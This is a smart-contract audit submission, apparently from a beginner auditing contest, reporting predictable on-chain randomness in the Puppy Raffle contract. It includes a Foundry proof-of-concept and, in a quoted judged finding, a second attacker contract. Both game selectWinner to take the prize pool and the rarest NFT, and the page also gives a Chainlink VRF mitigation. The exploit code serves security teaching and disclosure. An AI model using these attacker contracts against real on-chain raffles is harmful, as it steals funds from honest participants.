Puppy Raffle

AI First Flight #1
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Submission Details
Severity: high
Valid

Predictable on-chain randomness lets an attacker choose when to win and mint the rarest NFT

Predictable on-chain randomness lets an attacker choose when to win and mint the rarest NFT

Severity: High

Description

  • selectWinner is expected to pick a winner and NFT rarity unpredictably so that no participant can influence the outcome.

  • The winner index and rarity are derived from msg.sender, block.timestamp and block.difficulty — all values known to (and, for a validator, controllable by) the caller at the time of the call. Anyone can compute the result off-chain for a given block and submit the transaction only when it makes them win.

uint256 winnerIndex =
@> uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;
address winner = players[winnerIndex];
...
// rarity uses the same manipulable inputs
@> uint256 rarity = uint256(keccak256(abi.encodePacked(msg.sender, block.difficulty))) % 100;

Risk

Likelihood:

  • Occurs every time the raffle can be settled: the caller recomputes the exact formula off-chain and only sends the selectWinner transaction in a block where the result names their own address.

  • Occurs deterministically for a block producer, who sets block.timestamp and block.difficulty/prevrandao directly and can also front-run to reorder entrants.

Impact:

  • An attacker guarantees they win the 80% prize pool on every round, stealing funds from honest participants.

  • The attacker also forces the rarity roll, guaranteeing the rarest (legendary) NFT.

Proof of Concept

Save as test/RandomnessPoC.t.sol and run forge test --mt testAttackerForcesWin. The attacker scans candidate blocks off-chain for one it wins, warps to it, and captures the full 3.2 ETH prize pool.

// SPDX-License-Identifier: MIT
pragma solidity ^0.7.6;
pragma experimental ABIEncoderV2;
import {Test} from "forge-std/Test.sol";
import {PuppyRaffle} from "../src/PuppyRaffle.sol";
contract RandomnessPoC is Test {
PuppyRaffle puppyRaffle;
uint256 entranceFee = 1e18;
uint256 duration = 1 days;
function setUp() public {
puppyRaffle = new PuppyRaffle(entranceFee, address(99), duration);
}
function testAttackerForcesWin() public {
RandomnessAttacker attacker = new RandomnessAttacker(puppyRaffle);
vm.deal(address(attacker), entranceFee);
address[] memory players = new address[](4);
players[0] = address(101);
players[1] = address(102);
players[2] = address(103);
players[3] = address(attacker);
puppyRaffle.enterRaffle{value: entranceFee * 4}(players);
vm.warp(block.timestamp + duration + 1);
// Off-chain: find a block in which the attacker is the winner
uint256 winTs;
for (uint256 t = block.timestamp; t < block.timestamp + 5000; t++) {
uint256 idx = uint256(keccak256(abi.encodePacked(address(attacker), t, block.difficulty))) % 4;
if (puppyRaffle.players(idx) == address(attacker)) {
winTs = t;
break;
}
}
vm.warp(winTs);
uint256 balBefore = address(attacker).balance;
attacker.attack(4);
assertEq(puppyRaffle.previousWinner(), address(attacker));
assertEq(address(attacker).balance - balBefore, (4 * entranceFee * 80) / 100); // 3.2 ETH
}
}
contract RandomnessAttacker {
PuppyRaffle immutable puppyRaffle;
constructor(PuppyRaffle _r) {
puppyRaffle = _r;
}
function attack(uint256 count) external {
uint256 idx =
uint256(keccak256(abi.encodePacked(address(this), block.timestamp, block.difficulty))) % count;
require(puppyRaffle.players(idx) == address(this), "not our turn"); // only call on a guaranteed win
puppyRaffle.selectWinner();
}
receive() external payable {}
function onERC721Received(address, address, uint256, bytes calldata) external pure returns (bytes4) {
return this.onERC721Received.selector;
}
}

Recommended Mitigation

Never derive randomness from on-chain values. Use a verifiable off-chain source such as Chainlink VRF (request/fulfill), so the outcome is unknown at request time.

- uint256 winnerIndex =
- uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;
- address winner = players[winnerIndex];
+ // Request randomness from Chainlink VRF and select the winner in the
+ // fulfillRandomWords callback using the returned word:
+ uint256 winnerIndex = randomWord % players.length;
+ address winner = players[winnerIndex];

Apply the same VRF-sourced word to the rarity calculation.

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 3 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!